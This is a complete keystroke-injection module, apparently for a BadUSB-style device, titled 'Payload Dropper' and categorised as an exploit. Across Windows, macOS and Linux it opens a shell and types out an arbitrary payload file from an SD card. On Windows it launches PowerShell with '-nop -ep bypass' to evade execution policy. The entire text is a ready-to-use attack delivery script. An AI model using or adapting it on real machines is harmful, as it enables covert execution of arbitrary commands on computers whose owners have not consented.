NAME Payload Dropper
DESCRIPTION Types payload file contents from SD card into a terminal
CATEGORY exploit
PLATFORMS WIN,MAC,LINUX
OPTION PAYLOAD payload.txt "Filename in modules dir to type"
OPTION DELAY 2000 "Initial HID enumeration delay (ms)"
PLATFORM WIN
DELAY {{DELAY}}
GUI r
DELAY 800
STRING powershell -nop -ep bypass
ENTER
DELAY 1200
LED_COLOR YELLOW
TYPE_FILE {{PAYLOAD}}
ENTER
LED_COLOR GREEN
PLATFORM MAC
DELAY {{DELAY}}
GUI SPACE
DELAY 700
STRING Terminal
ENTER
DELAY 1400
LED_COLOR YELLOW
TYPE_FILE {{PAYLOAD}}
ENTER
LED_COLOR GREEN
PLATFORM LINUX
DELAY {{DELAY}}
CTRL ALT t
DELAY 1400
LED_COLOR YELLOW
TYPE_FILE {{PAYLOAD}}
ENTER
LED_COLOR GREEN
